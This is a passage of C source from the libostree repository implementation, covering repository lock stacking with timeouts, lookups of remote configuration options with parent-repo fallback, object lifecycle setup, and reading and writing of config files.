failed", gs_file_get_path_cached (self->repodir)); } g_hash_table_insert (lock_table, self, lock); } OstreeRepoLockInfo info; repo_lock_info (lock, &info); g_debug ("Push lock: state=%s, depth=%u", info.name, info.len); if (info.state == LOCK_EX) { g_debug ("Repo already locked 
exclusively, extending stack"); g_queue_push_head (&lock->stack, GINT_TO_POINTER (LOCK_EX)); } else { int next_state = (flags & LOCK_EX) ? LOCK_EX : LOCK_SH; const char *next_state_name = (flags & LOCK_EX) ? "exclusive" : "shared"; g_debug ("Locking repo %s", next_state_name); if (!do_repo_lock (lock->fd, flags)) return glnx_throw_errno_prefix (error, "Locking repo %s failed", next_state_name); g_queue_push_head (&lock->stack, GINT_TO_POINTER (next_state)); } return TRUE; } static gboolean pop_repo_lock (OstreeRepo *self, gboolean blocking, GError **error) { int flags = blocking ? 0 : LOCK_NB; GHashTable *lock_table = g_private_get (&repo_lock_table); g_return_val_if_fail (lock_table != NULL, FALSE); OstreeRepoLock *lock = g_hash_table_lookup (lock_table, self); g_return_val_if_fail (lock != NULL, FALSE); g_return_val_if_fail (lock->fd != -1, FALSE); OstreeRepoLockInfo info; repo_lock_info (lock, &info); g_return_val_if_fail (info.len > 0, FALSE); g_debug ("Pop lock: state=%s, depth=%u", info.name, info.len); if (info.len > 1) { int next_state = GPOINTER_TO_INT (g_queue_peek_nth (&lock->stack, 1)); /* Drop back to the previous lock state if it differs */ if (next_state != info.state) { /* We should never drop from shared to exclusive */ g_return_val_if_fail (next_state == LOCK_SH, FALSE); g_debug ("Returning lock state to shared"); if (!do_repo_lock (lock->fd, next_state | flags)) return glnx_throw_errno_prefix (error, "Setting repo lock to shared failed"); } else g_debug ("Maintaining lock state as %s", info.name); } else { /* Lock stack will be empty, unlock */ g_debug ("Unlocking repo"); if (!do_repo_unlock (lock->fd, flags)) return glnx_throw_errno_prefix (error, "Unlocking repo failed"); } g_queue_pop_head (&lock->stack); return TRUE; } /* * ostree_repo_lock_push: * @self: a #OstreeRepo * @lock_type: the type of lock to acquire * @cancellable: a #GCancellable * @error: a #GError * * Takes a lock on the repository and adds it to the lock stack. 
 * If @lock_type
 * is %OSTREE_REPO_LOCK_SHARED, a shared lock is taken. If @lock_type is
 * %OSTREE_REPO_LOCK_EXCLUSIVE, an exclusive lock is taken. The actual lock
 * state is only changed when locking a previously unlocked repository or
 * upgrading the lock from shared to exclusive. If the requested lock state is
 * unchanged or would represent a downgrade (exclusive to shared), the lock
 * state is not changed and the stack is simply updated.
 *
 * ostree_repo_lock_push() waits for the lock depending on the repository's
 * lock-timeout-secs configuration. When lock-timeout-secs is -1, a blocking lock is
 * attempted. Otherwise, the lock is taken non-blocking and
 * ostree_repo_lock_push() will sleep synchronously up to lock-timeout-secs seconds
 * attempting to acquire the lock. If the lock cannot be acquired within the
 * timeout, a %G_IO_ERROR_WOULD_BLOCK error is returned.
 *
 * If @self is not writable by the user, then no locking is attempted and
 * %TRUE is returned.
 *
 * Returns: %TRUE on success, otherwise %FALSE with @error set
 */
gboolean
_ostree_repo_lock_push (OstreeRepo          *self,
                        OstreeRepoLockType   lock_type,
                        GCancellable        *cancellable,
                        GError             **error)
{
  g_return_val_if_fail (self != NULL, FALSE);
  g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE);
  g_return_val_if_fail (self->inited, FALSE);
  g_return_val_if_fail (cancellable == NULL || G_IS_CANCELLABLE (cancellable), FALSE);
  g_return_val_if_fail (error == NULL || *error == NULL, FALSE);

  /* Read-only repos are never locked — there is nothing to protect */
  if (!self->writable)
    return TRUE;

  g_assert (self->lock_timeout_seconds >= REPO_LOCK_DISABLED);
  if (self->lock_timeout_seconds == REPO_LOCK_DISABLED)
    return TRUE; /* No locking */
  else if (self->lock_timeout_seconds == REPO_LOCK_BLOCKING)
    {
      g_debug ("Pushing lock blocking");
      return push_repo_lock (self, lock_type, TRUE, error);
    }
  else
    {
      /* Convert to unsigned to guard against negative values */
      guint lock_timeout_seconds = self->lock_timeout_seconds;
      guint waited = 0;
      g_debug ("Pushing lock non-blocking with timeout %u",
               lock_timeout_seconds);
      for (;;)
        {
          if (g_cancellable_set_error_if_cancelled (cancellable, error))
            return FALSE;

          g_autoptr(GError) local_error = NULL;
          if (push_repo_lock (self, lock_type, FALSE, &local_error))
            return TRUE;

          /* Anything other than lock contention is a hard failure */
          if (!g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_WOULD_BLOCK))
            {
              g_propagate_error (error, g_steal_pointer (&local_error));
              return FALSE;
            }

          if (waited >= lock_timeout_seconds)
            {
              g_debug ("Push lock: Could not acquire lock within %u seconds",
                       lock_timeout_seconds);
              g_propagate_error (error, g_steal_pointer (&local_error));
              return FALSE;
            }

          /* Sleep 1 second and try again */
          if (waited % 60 == 0)
            {
              guint remaining = lock_timeout_seconds - waited;
              g_debug ("Push lock: Waiting %u more second%s to acquire lock",
                       remaining, (remaining == 1) ? "" : "s");
            }
          waited++;
          sleep (1);
        }
    }
}

/*
 * _ostree_repo_lock_pop:
 * @self: a #OstreeRepo
 * @cancellable: a #GCancellable
 * @error: a #GError
 *
 * Remove the current repository lock state from the lock stack. If the lock
 * stack becomes empty, the repository is unlocked. Otherwise, the lock state
 * only changes when transitioning from an exclusive lock back to a shared
 * lock.
 *
 * ostree_repo_lock_pop() waits for the lock depending on the repository's
 * lock-timeout-secs configuration. When lock-timeout-secs is -1, a blocking lock is
 * attempted. Otherwise, the lock is removed non-blocking and
 * ostree_repo_lock_pop() will sleep synchronously up to lock-timeout-secs seconds
 * attempting to remove the lock. If the lock cannot be removed within the
 * timeout, a %G_IO_ERROR_WOULD_BLOCK error is returned.
 *
 * If @self is not writable by the user, then no unlocking is attempted and
 * %TRUE is returned.
* * Returns: %TRUE on success, otherwise %FALSE with @error set */ gboolean _ostree_repo_lock_pop (OstreeRepo *self, GCancellable *cancellable, GError **error) { g_return_val_if_fail (self != NULL, FALSE); g_return_val_if_fail (OSTREE_IS_REPO (self), FALSE); g_return_val_if_fail (self->inited, FALSE); g_return_val_if_fail (cancellable == NULL || G_IS_CANCELLABLE (cancellable), FALSE); g_return_val_if_fail (error == NULL || *error == NULL, FALSE); if (!self->writable) return TRUE; g_assert (self->lock_timeout_seconds >= REPO_LOCK_DISABLED); if (self->lock_timeout_seconds == REPO_LOCK_DISABLED) return TRUE; else if (self->lock_timeout_seconds == REPO_LOCK_BLOCKING) { g_debug ("Popping lock blocking"); return pop_repo_lock (self, TRUE, error); } else { /* Convert to unsigned to guard against negative values */ guint lock_timeout_seconds = self->lock_timeout_seconds; guint waited = 0; g_debug ("Popping lock non-blocking with timeout %u", lock_timeout_seconds); for (;;) { if (g_cancellable_set_error_if_cancelled (cancellable, error)) return FALSE; g_autoptr(GError) local_error = NULL; if (pop_repo_lock (self, FALSE, &local_error)) return TRUE; if (!g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_WOULD_BLOCK)) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } if (waited >= lock_timeout_seconds) { g_debug ("Pop lock: Could not remove lock within %u seconds", lock_timeout_seconds); g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } /* Sleep 1 second and try again */ if (waited % 60 == 0) { guint remaining = lock_timeout_seconds - waited; g_debug ("Pop lock: Waiting %u more second%s to remove lock", remaining, (remaining == 1) ? "" : "s"); } waited++; sleep (1); } } } /* * _ostree_repo_auto_lock_push: (skip) * @self: a #OstreeRepo * @lock_type: the type of lock to acquire * @cancellable: a #GCancellable * @error: a #GError * * Like ostree_repo_lock_push(), but for usage with #OstreeRepoAutoLock. 
* The intended usage is to declare the #OstreeRepoAutoLock with * g_autoptr() so that ostree_repo_auto_lock_cleanup() is called when it * goes out of scope. This will automatically pop the lock status off * the stack if it was acquired successfully. * * |[<!-- language="C" --> * g_autoptr(OstreeRepoAutoLock) lock = NULL; * lock = _ostree_repo_auto_lock_push (repo, lock_type, cancellable, error); * if (!lock) * return FALSE; * ]| * * Returns: @self on success, otherwise %NULL with @error set */ OstreeRepoAutoLock * _ostree_repo_auto_lock_push (OstreeRepo *self, OstreeRepoLockType lock_type, GCancellable *cancellable, GError **error) { if (!_ostree_repo_lock_push (self, lock_type, cancellable, error)) return NULL; return (OstreeRepoAutoLock *)self; } /* * _ostree_repo_auto_lock_cleanup: (skip) * @lock: a #OstreeRepoAutoLock * * A cleanup handler for use with ostree_repo_auto_lock_push(). If @lock is * not %NULL, ostree_repo_lock_pop() will be called on it. If * ostree_repo_lock_pop() fails, a critical warning will be emitted. 
*/ void _ostree_repo_auto_lock_cleanup (OstreeRepoAutoLock *lock) { OstreeRepo *repo = lock; if (repo) { g_autoptr(GError) error = NULL; int errsv = errno; if (!_ostree_repo_lock_pop (repo, NULL, &error)) g_critical ("Cleanup repo lock failed: %s", error->message); errno = errsv; } } static GFile * get_remotes_d_dir (OstreeRepo *self, GFile *sysroot); OstreeRemote * _ostree_repo_get_remote (OstreeRepo *self, const char *name, GError **error) { OstreeRemote *remote = NULL; g_return_val_if_fail (name != NULL, NULL); g_mutex_lock (&self->remotes_lock); remote = g_hash_table_lookup (self->remotes, name); if (remote != NULL) ostree_remote_ref (remote); else g_set_error (error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND, "Remote \"%s\" not found", name); g_mutex_unlock (&self->remotes_lock); return remote; } OstreeRemote * _ostree_repo_get_remote_inherited (OstreeRepo *self, const char *name, GError **error) { g_autoptr(OstreeRemote) remote = NULL; g_autoptr(GError) temp_error = NULL; remote = _ostree_repo_get_remote (self, name, &temp_error); if (remote == NULL) { if (self->parent_repo != NULL) return _ostree_repo_get_remote_inherited (self->parent_repo, name, error); g_propagate_error (error, g_steal_pointer (&temp_error)); return NULL; } return g_steal_pointer (&remote); } gboolean _ostree_repo_add_remote (OstreeRepo *self, OstreeRemote *remote) { gboolean already_existed; g_return_val_if_fail (self != NULL, FALSE); g_return_val_if_fail (remote != NULL, FALSE); g_return_val_if_fail (remote->name != NULL, FALSE); g_mutex_lock (&self->remotes_lock); already_existed = !g_hash_table_replace (self->remotes, remote->name, ostree_remote_ref (remote)); g_mutex_unlock (&self->remotes_lock); return already_existed; } gboolean _ostree_repo_remove_remote (OstreeRepo *self, OstreeRemote *remote) { gboolean removed; g_return_val_if_fail (self != NULL, FALSE); g_return_val_if_fail (remote != NULL, FALSE); g_return_val_if_fail (remote->name != NULL, FALSE); g_mutex_lock (&self->remotes_lock); 
removed = g_hash_table_remove (self->remotes, remote->name); g_mutex_unlock (&self->remotes_lock); return removed; } gboolean _ostree_repo_remote_name_is_file (const char *remote_name) { return g_str_has_prefix (remote_name, "file://"); } /** * ostree_repo_get_remote_option: * @self: A OstreeRepo * @remote_name: Name * @option_name: Option * @default_value: (allow-none): Value returned if @option_name is not present * @out_value: (out): Return location for value * @error: Error * * OSTree remotes are represented by keyfile groups, formatted like: * `[remote "remotename"]`. This function returns a value named @option_name * underneath that group, or @default_value if the remote exists but not the * option name. If an error is returned, @out_value will be set to %NULL. * * Returns: %TRUE on success, otherwise %FALSE with @error set * * Since: 2016.5 */ gboolean ostree_repo_get_remote_option (OstreeRepo *self, const char *remote_name, const char *option_name, const char *default_value, char **out_value, GError **error) { g_autoptr(OstreeRemote) remote = NULL; gboolean ret = FALSE; g_autoptr(GError) temp_error = NULL; g_autofree char *value = NULL; if (_ostree_repo_remote_name_is_file (remote_name)) { *out_value = g_strdup (default_value); return TRUE; } remote = _ostree_repo_get_remote (self, remote_name, &temp_error); if (remote != NULL) { value = g_key_file_get_string (remote->options, remote->group, option_name, &temp_error); if (value == NULL) { if (g_error_matches (temp_error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND)) { /* Note: We ignore errors on the parent because the parent config may not specify this remote, causing a "remote not found" error, but we found the remote at some point, so we need to instead return the default */ if (self->parent_repo != NULL && ostree_repo_get_remote_option (self->parent_repo, remote_name, option_name, default_value, out_value, NULL)) return TRUE; value = g_strdup (default_value); ret = TRUE; } else g_propagate_error 
(error, g_steal_pointer (&temp_error)); } else ret = TRUE; } else if (self->parent_repo != NULL) return ostree_repo_get_remote_option (self->parent_repo, remote_name, option_name, default_value, out_value, error); else g_propagate_error (error, g_steal_pointer (&temp_error)); *out_value = g_steal_pointer (&value); return ret; } /** * ostree_repo_get_remote_list_option: * @self: A OstreeRepo * @remote_name: Name * @option_name: Option * @out_value: (out) (array zero-terminated=1): location to store the list * of strings. The list should be freed with * g_strfreev(). * @error: Error * * OSTree remotes are represented by keyfile groups, formatted like: * `[remote "remotename"]`. This function returns a value named @option_name * underneath that group, and returns it as a zero terminated array of strings. * If the option is not set, or if an error is returned, @out_value will be set * to %NULL. * * Returns: %TRUE on success, otherwise %FALSE with @error set * * Since: 2016.5 */ gboolean ostree_repo_get_remote_list_option (OstreeRepo *self, const char *remote_name, const char *option_name, char ***out_value, GError **error) { g_autoptr(OstreeRemote) remote = NULL; gboolean ret = FALSE; g_autoptr(GError) temp_error = NULL; g_auto(GStrv) value = NULL; if (_ostree_repo_remote_name_is_file (remote_name)) { *out_value = NULL; return TRUE; } remote = _ostree_repo_get_remote (self, remote_name, &temp_error); if (remote != NULL) { value = g_key_file_get_string_list (remote->options, remote->group, option_name, NULL, &temp_error); /* Default value if key not found is always NULL. 
*/ if (g_error_matches (temp_error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND)) { /* Note: We ignore errors on the parent because the parent config may not specify this remote, causing a "remote not found" error, but we found the remote at some point, so we need to instead return the default */ if (self->parent_repo != NULL && ostree_repo_get_remote_list_option (self->parent_repo, remote_name, option_name, out_value, NULL)) return TRUE; ret = TRUE; } else if (temp_error) g_propagate_error (error, g_steal_pointer (&temp_error)); else ret = TRUE; } else if (self->parent_repo != NULL) return ostree_repo_get_remote_list_option (self->parent_repo, remote_name, option_name, out_value, error); else g_propagate_error (error, g_steal_pointer (&temp_error)); *out_value = g_steal_pointer (&value); return ret; } /** * ostree_repo_get_remote_boolean_option: * @self: A OstreeRepo * @remote_name: Name * @option_name: Option * @default_value: Value returned if @option_name is not present * @out_value: (out) : location to store the result. * @error: Error * * OSTree remotes are represented by keyfile groups, formatted like: * `[remote "remotename"]`. This function returns a value named @option_name * underneath that group, and returns it as a boolean. * If the option is not set, @out_value will be set to @default_value. If an * error is returned, @out_value will be set to %FALSE. 
* * Returns: %TRUE on success, otherwise %FALSE with @error set * * Since: 2016.5 */ gboolean ostree_repo_get_remote_boolean_option (OstreeRepo *self, const char *remote_name, const char *option_name, gboolean default_value, gboolean *out_value, GError **error) { g_autoptr(OstreeRemote) remote = NULL; g_autoptr(GError) temp_error = NULL; gboolean ret = FALSE; gboolean value = FALSE; if (_ostree_repo_remote_name_is_file (remote_name)) { *out_value = default_value; return TRUE; } remote = _ostree_repo_get_remote (self, remote_name, &temp_error); if (remote != NULL) { value = g_key_file_get_boolean (remote->options, remote->group, option_name, &temp_error); if (temp_error != NULL) { if (g_error_matches (temp_error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND)) { /* Note: We ignore errors on the parent because the parent config may not specify this remote, causing a "remote not found" error, but we found the remote at some point, so we need to instead return the default */ if (self->parent_repo != NULL && ostree_repo_get_remote_boolean_option (self->parent_repo, remote_name, option_name, default_value, out_value, NULL)) return TRUE; value = default_value; ret = TRUE; } else g_propagate_error (error, g_steal_pointer (&temp_error)); } else ret = TRUE; } else if (self->parent_repo != NULL) return ostree_repo_get_remote_boolean_option (self->parent_repo, remote_name, option_name, default_value, out_value, error); else g_propagate_error (error, g_steal_pointer (&temp_error)); *out_value = value; return ret; } static void ostree_repo_finalize (GObject *object) { OstreeRepo *self = OSTREE_REPO (object); g_clear_object (&self->parent_repo); g_free (self->stagedir_prefix); g_clear_object (&self->repodir_fdrel); g_clear_object (&self->repodir); glnx_close_fd (&self->repo_dir_fd); glnx_tmpdir_unset (&self->commit_stagedir); glnx_release_lock_file (&self->commit_stagedir_lock); glnx_close_fd (&self->tmp_dir_fd); glnx_close_fd (&self->cache_dir_fd); glnx_close_fd 
(&self->objects_dir_fd); glnx_close_fd (&self->uncompressed_objects_dir_fd); g_clear_object (&self->sysroot_dir); g_weak_ref_clear (&self->sysroot); g_free (self->remotes_config_dir); if (self->loose_object_devino_hash) g_hash_table_destroy (self->loose_object_devino_hash); if (self->updated_uncompressed_dirs) g_hash_table_destroy (self->updated_uncompressed_dirs); if (self->config) g_key_file_free (self->config); g_clear_pointer (&self->txn.refs, g_hash_table_destroy); g_clear_pointer (&self->txn.collection_refs, g_hash_table_destroy); g_clear_error (&self->writable_error); g_clear_pointer (&self->object_sizes, (GDestroyNotify) g_hash_table_unref); g_clear_pointer (&self->dirmeta_cache, (GDestroyNotify) g_hash_table_unref); g_mutex_clear (&self->cache_lock); g_mutex_clear (&self->txn_lock); g_free (self->collection_id); g_strfreev (self->repo_finders); g_clear_pointer (&self->remotes, g_hash_table_destroy); g_mutex_clear (&self->remotes_lock); GHashTable *lock_table = g_private_get (&repo_lock_table); if (lock_table) { g_hash_table_remove (lock_table, self); if (g_hash_table_size (lock_table) == 0) g_private_replace (&repo_lock_table, NULL); } G_OBJECT_CLASS (ostree_repo_parent_class)->finalize (object); } static void ostree_repo_set_property(GObject *object, guint prop_id, const GValue *value, GParamSpec *pspec) { OstreeRepo *self = OSTREE_REPO (object); switch (prop_id) { case PROP_PATH: self->repodir = g_value_dup_object (value); break; case PROP_SYSROOT_PATH: self->sysroot_dir = g_value_dup_object (value); break; case PROP_REMOTES_CONFIG_DIR: self->remotes_config_dir = g_value_dup_string (value); break; default: G_OBJECT_WARN_INVALID_PROPERTY_ID (object, prop_id, pspec); break; } } static void ostree_repo_get_property(GObject *object, guint prop_id, GValue *value, GParamSpec *pspec) { OstreeRepo *self = OSTREE_REPO (object); switch (prop_id) { case PROP_PATH: g_value_set_object (value, self->repodir); break; case PROP_SYSROOT_PATH: g_value_set_object (value, 
self->sysroot_dir); break; case PROP_REMOTES_CONFIG_DIR: g_value_set_string (value, self->remotes_config_dir); break; default: G_OBJECT_WARN_INVALID_PROPERTY_ID (object, prop_id, pspec); break; } } static void ostree_repo_class_init (OstreeRepoClass *klass) { GObjectClass *object_class = G_OBJECT_CLASS (klass); object_class->get_property = ostree_repo_get_property; object_class->set_property = ostree_repo_set_property; object_class->finalize = ostree_repo_finalize; /** * OstreeRepo:path: * * Path to repository. Note that if this repository was created * via `ostree_repo_new_at()`, this value will refer to a value in * the Linux kernel's `/proc/self/fd` directory. Generally, you * should avoid using this property at all; you can gain a reference * to the repository's directory fd via `ostree_repo_get_dfd()` and * use file-descriptor relative operations. */ g_object_class_install_property (object_class, PROP_PATH, g_param_spec_object ("path", "Path", "Path", G_TYPE_FILE, G_PARAM_READWRITE | G_PARAM_CONSTRUCT_ONLY)); /** * OstreeRepo:sysroot-path: * * A system using libostree for the host has a "system" repository; this * property will be set for repositories referenced via * `ostree_sysroot_repo()` for example. * * You should avoid using this property; if your code is operating * on a system repository, use `OstreeSysroot` and access the repository * object via `ostree_sysroot_repo()`. */ g_object_class_install_property (object_class, PROP_SYSROOT_PATH, g_param_spec_object ("sysroot-path", "", "", G_TYPE_FILE, G_PARAM_READWRITE | G_PARAM_CONSTRUCT_ONLY)); /** * OstreeRepo:remotes-config-dir: * * Path to directory containing remote definitions. The default is `NULL`. * If a `sysroot-path` property is defined, this value will default to * `${sysroot_path}/etc/ostree/remotes.d`. * * This value will only be used for system repositories. 
*/ g_object_class_install_property (object_class, PROP_REMOTES_CONFIG_DIR, g_param_spec_string ("remotes-config-dir", "", "", NULL, G_PARAM_READWRITE | G_PARAM_CONSTRUCT_ONLY)); #ifndef OSTREE_DISABLE_GPGME /** * OstreeRepo::gpg-verify-result: * @self: an #OstreeRepo * @checksum: checksum of the signed object * @result: an #OstreeGpgVerifyResult * * Emitted during a pull operation upon GPG verification (if enabled). * Applications can connect to this signal to output the verification * results if desired. * * The signal will be emitted from whichever #GMainContext is the * thread-default at the point when ostree_repo_pull_with_options() * is called. */ signals[GPG_VERIFY_RESULT] = g_signal_new ("gpg-verify-result", OSTREE_TYPE_REPO, G_SIGNAL_RUN_LAST, G_STRUCT_OFFSET (OstreeRepoClass, gpg_verify_result), NULL, NULL, NULL, G_TYPE_NONE, 2, G_TYPE_STRING, OSTREE_TYPE_GPG_VERIFY_RESULT); #endif /* OSTREE_DISABLE_GPGME */ } static void ostree_repo_init (OstreeRepo *self) { const GDebugKey test_error_keys[] = { { "pre-commit", OSTREE_REPO_TEST_ERROR_PRE_COMMIT }, { "invalid-cache", OSTREE_REPO_TEST_ERROR_INVALID_CACHE }, }; #ifndef OSTREE_DISABLE_GPGME static gsize gpgme_initialized; if (g_once_init_enter (&gpgme_initialized)) { gpgme_check_version (NULL); gpgme_set_locale (NULL, LC_CTYPE, setlocale (LC_CTYPE, NULL)); g_once_init_leave (&gpgme_initialized, 1); } #endif self->test_error_flags = g_parse_debug_string (g_getenv ("OSTREE_REPO_TEST_ERROR"), test_error_keys, G_N_ELEMENTS (test_error_keys)); g_mutex_init (&self->cache_lock); g_mutex_init (&self->txn_lock); self->remotes = g_hash_table_new_full (g_str_hash, g_str_equal, (GDestroyNotify) NULL, (GDestroyNotify) ostree_remote_unref); g_mutex_init (&self->remotes_lock); self->repo_dir_fd = -1; self->cache_dir_fd = -1; self->tmp_dir_fd = -1; self->objects_dir_fd = -1; self->uncompressed_objects_dir_fd = -1; self->sysroot_kind = OSTREE_REPO_SYSROOT_KIND_UNKNOWN; } /** * ostree_repo_new: * @path: Path to a repository * 
* Returns: (transfer full): An accessor object for an OSTree repository located at @path */ OstreeRepo* ostree_repo_new (GFile *path) { return g_object_new (OSTREE_TYPE_REPO, "path", path, NULL); } static OstreeRepo * repo_open_at_take_fd (int *dfd, GCancellable *cancellable, GError **error) { g_autoptr(OstreeRepo) repo = g_object_new (OSTREE_TYPE_REPO, NULL); repo->repo_dir_fd = glnx_steal_fd (dfd); if (!ostree_repo_open (repo, cancellable, error)) return NULL; return g_steal_pointer (&repo); } /** * ostree_repo_open_at: * @dfd: Directory fd * @path: Path * * This combines ostree_repo_new() (but using fd-relative access) with * ostree_repo_open(). Use this when you know you should be operating on an * already extant repository. If you want to create one, use ostree_repo_create_at(). * * Returns: (transfer full): An accessor object for an OSTree repository located at @dfd + @path * * Since: 2017.10 */ OstreeRepo* ostree_repo_open_at (int dfd, const char *path, GCancellable *cancellable, GError **error) { glnx_autofd int repo_dfd = -1; if (!glnx_opendirat (dfd, path, TRUE, &repo_dfd, error)) return NULL; return repo_open_at_take_fd (&repo_dfd, cancellable, error); } static GFile * get_default_repo_path (GFile *sysroot_path) { if (sysroot_path == NULL) sysroot_path = _ostree_get_default_sysroot_path (); return g_file_resolve_relative_path (sysroot_path, "ostree/repo"); } /** * ostree_repo_new_for_sysroot_path: * @repo_path: Path to a repository * @sysroot_path: Path to the system root * * Creates a new #OstreeRepo instance, taking the system root path explicitly * instead of assuming "/". * * Returns: (transfer full): An accessor object for the OSTree repository located at @repo_path. 
*/ OstreeRepo * ostree_repo_new_for_sysroot_path (GFile *repo_path, GFile *sysroot_path) { return g_object_new (OSTREE_TYPE_REPO, "path", repo_path, "sysroot-path", sysroot_path, NULL); } /** * ostree_repo_new_default: * * If the current working directory appears to be an OSTree * repository, create a new #OstreeRepo object for accessing it. * Otherwise use the path in the OSTREE_REPO environment variable * (if defined) or else the default system repository located at * /ostree/repo. * * Returns: (transfer full): An accessor object for an OSTree repository located at /ostree/repo */ OstreeRepo* ostree_repo_new_default (void) { if (g_file_test ("objects", G_FILE_TEST_IS_DIR) && g_file_test ("config", G_FILE_TEST_IS_REGULAR)) { g_autoptr(GFile) cwd = g_file_new_for_path ("."); return ostree_repo_new (cwd); } else { const char *envvar = g_getenv ("OSTREE_REPO"); g_autoptr(GFile) repo_path = NULL; if (envvar == NULL || *envvar == '\0') repo_path = get_default_repo_path (NULL); else repo_path = g_file_new_for_path (envvar); return ostree_repo_new (repo_path); } } /** * ostree_repo_is_system: * @repo: Repository * * Returns: %TRUE if this repository is the root-owned system global repository */ gboolean ostree_repo_is_system (OstreeRepo *repo) { g_return_val_if_fail (OSTREE_IS_REPO (repo), FALSE); /* If we were created via ostree_sysroot_get_repo(), we know the answer is yes * without having to compare file paths. */ if (repo->sysroot_kind == OSTREE_REPO_SYSROOT_KIND_VIA_SYSROOT || repo->sysroot_kind == OSTREE_REPO_SYSROOT_KIND_IS_SYSROOT_OSTREE) return TRUE; /* No sysroot_dir set? Not a system repo then. */ if (!repo->sysroot_dir) return FALSE; /* If we created via ostree_repo_new(), we'll have a repo path. Compare * it to the sysroot path in that case. 
*/ if (repo->repodir) { g_autoptr(GFile) default_repo_path = get_default_repo_path (repo->sysroot_dir); return g_file_equal (repo->repodir, default_repo_path); } /* Otherwise, not a system repo */ return FALSE; } /** * ostree_repo_is_writable: * @self: Repo * @error: a #GError * * Returns whether the repository is writable by the current user. * If the repository is not writable, the @error indicates why. * * Returns: %TRUE if this repository is writable */ gboolean ostree_repo_is_writable (OstreeRepo *self, GError **error) { g_return_val_if_fail (self->inited, FALSE); if (error != NULL && self->writable_error != NULL) *error = g_error_copy (self->writable_error); return self->writable; } /** * _ostree_repo_update_mtime: * @self: Repo * @error: a #GError * * Bump the mtime of the repository so that programs * can detect that the refs have updated. */ gboolean _ostree_repo_update_mtime (OstreeRepo *self, GError **error) { if (futimens (self->repo_dir_fd, NULL) != 0) { glnx_set_prefix_error_from_errno (error, "%s", "futimens"); return FALSE; } return TRUE; } /** * ostree_repo_get_config: * @self: * * Returns: (transfer none): The repository configuration; do not modify */ GKeyFile * ostree_repo_get_config (OstreeRepo *self) { g_return_val_if_fail (self->inited, NULL); return self->config; } /** * ostree_repo_copy_config: * @self: * * Returns: (transfer full): A newly-allocated copy of the repository config */ GKeyFile * ostree_repo_copy_config (OstreeRepo *self) { GKeyFile *copy; char *data; gsize len; g_return_val_if_fail (self->inited, NULL); copy = g_key_file_new (); data = g_key_file_to_data (self->config, &len, NULL); if (!g_key_file_load_from_data (copy, data, len, 0, NULL)) g_assert_not_reached (); g_free (data); return copy; } /** * ostree_repo_write_config: * @self: Repo * @new_config: Overwrite the config file with this data * @error: a #GError * * Save @new_config in place of this repository's config file. 
*/ gboolean ostree_repo_write_config (OstreeRepo *self, GKeyFile *new_config, GError **error) { g_return_val_if_fail (self->inited, FALSE); /* Ensure that any remotes in the new config aren't defined in a * separate config file. */ gsize num_groups; g_auto(GStrv) groups = g_key_file_get_groups (new_config, &num_groups); for (gsize i = 0; i < num_groups; i++) { g_autoptr(OstreeRemote) new_remote = ostree_remote_new_from_keyfile (new_config, groups[i]); if (new_remote != NULL) { g_autoptr(GError) local_error = NULL; g_autoptr(OstreeRemote) cur_remote = _ostree_repo_get_remote (self, new_remote->name, &local_error); if (cur_remote == NULL) { if (!g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_NOT_FOUND)) { g_propagate_error (error, g_steal_pointer (&local_error)); return FALSE; } } else if (cur_remote->file != NULL) { g_set_error (error, G_IO_ERROR, G_IO_ERROR_EXISTS, "Remote \"%s\" already defined in %s", new_remote->name, gs_file_get_path_cached (cur_remote->file)); return FALSE; } } } gsize len; g_autofree char *data = g_key_file_to_data (new_config, &len, error); if (!glnx_file_replace_contents_at (self->repo_dir_fd, "config", (guint8*)data, len, 0, NULL, error)) return FALSE; g_key_file_free (self->config); self->config = g_key_file_new (); if (!g_key_file_load_from_data (self->config, data, len, 0, error)) return FALSE; return TRUE; } /* Bind a subset of an a{sv} to options in a given GKeyfile section */ static void keyfile_set_from_vardict (GKeyFile *keyfile, const char *section, GVariant *vardict) { GVariantIter viter; const char *key; GVariant *val; g_variant_iter_init (&viter, vardict); while (g_variant_iter_loop (&viter, "{&s@v}", &key, &val)) { g_autoptr(GVariant) child = g_variant_get_variant (val); if (g_variant_is_of_type (child, G_VARIANT_TYPE_STRING)) g_key_file_set_string (keyfile, section, key, g_variant_get_string (child, NULL)); else if (g_variant_is_of_type (child, G_VARIANT_TYPE_BOOLEAN)) g_key_file_set_boolean (keyfile, section, key, 
g_variant_get_boolean (child)); else if (g_variant_is_of_type (child, G_VARIANT_TYPE_STRING_ARRAY)) { gsize len; g_autofree const gchar **strv_child = g_variant_get_strv (child, &len); g_key_file_set_string_list (keyfile, section, key, strv_child, len); } else g_critical ("Unhandled type '%s' in %s", (char*)g_variant_get_type (child), G_STRFUNC); } } static gboolean impl_repo_remote_add (OstreeRepo *self, GFile *sysroot, gboolean if_not_exists, const char *name, const char *url, GVariant *options, GCancellable *cancellable, GError **error) { g_return_val_if_fail (name != NULL, FALSE); g_return_val_if_fail (url != NULL, FALSE); g_return_val_if_fail (options == NULL || g_variant_is_of_type (options, G_VARIANT_TYPE ("a{sv}")), FALSE); if (!ostree_validate_remote_name (name, error)) return FALSE; g_autoptr(OstreeRemote) remote = _ostree_repo_get_remote (self, name, NULL); if (remote != NULL && if_not_exists) { /* Note early return */ return TRUE; } else if (remote != NULL) { return glnx_throw (error, "Remote configuration for \"%s\" already exists: %s", name, remote->file ? gs_file_get_path_cached (remote->file) : "(in config)"); } remote = ostree_remote_new (name); /* Only add repos in remotes.d if the repo option * add-remotes-config-dir is true. This is the default for system * repos. 
